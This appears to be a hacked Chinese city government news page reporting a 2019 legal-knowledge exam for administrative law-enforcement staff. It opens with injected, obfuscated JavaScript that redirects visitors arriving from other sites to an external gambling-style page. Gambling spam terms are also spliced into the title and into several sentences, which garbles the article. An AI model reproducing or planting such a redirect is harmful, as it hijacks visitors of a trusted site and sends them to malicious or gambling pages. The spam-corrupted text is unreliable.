var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > bbin宝盈,bbin下载:
发布日期:2019-10-31 浏览次数: 字号:[ ]

10月30日,bbin宝盈,bbin下载:2019年度市本级行政执法人员综合法律知识考试在秀水经济信息专修学院举行,市级行政执法部门、南湖区和秀洲相关行政执法部门共279人参加考试。bbin宝盈,bbin下载:司法局调研员杨建强到考场巡考。

本次考试是bbin宝盈,bbin下载:机构改革后组织的首次行政执法人员综合法律知识考试,采取电脑随机派考与系统统一阅卷,考试结束当即显示考试结果,确保考试成绩真实有效。考试合格人员取得行政执法证后,方可从事行政执法工作。为加强考生对行政执法相关法律知识的学习和了解,市司法局为报名参考的行政执法人员组织了考前培训,并要求全体报考人员通过2次在线模拟测试后方可参加本次考试。

下一步,市司法局将对考试合格人员进行信息录入、审核上传,申领办理、制作下发《浙江省行政执法证》等工作,严格落实行政执法人员持证上岗。

IMG_20191030_141151.jpg

市局调研督察处




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统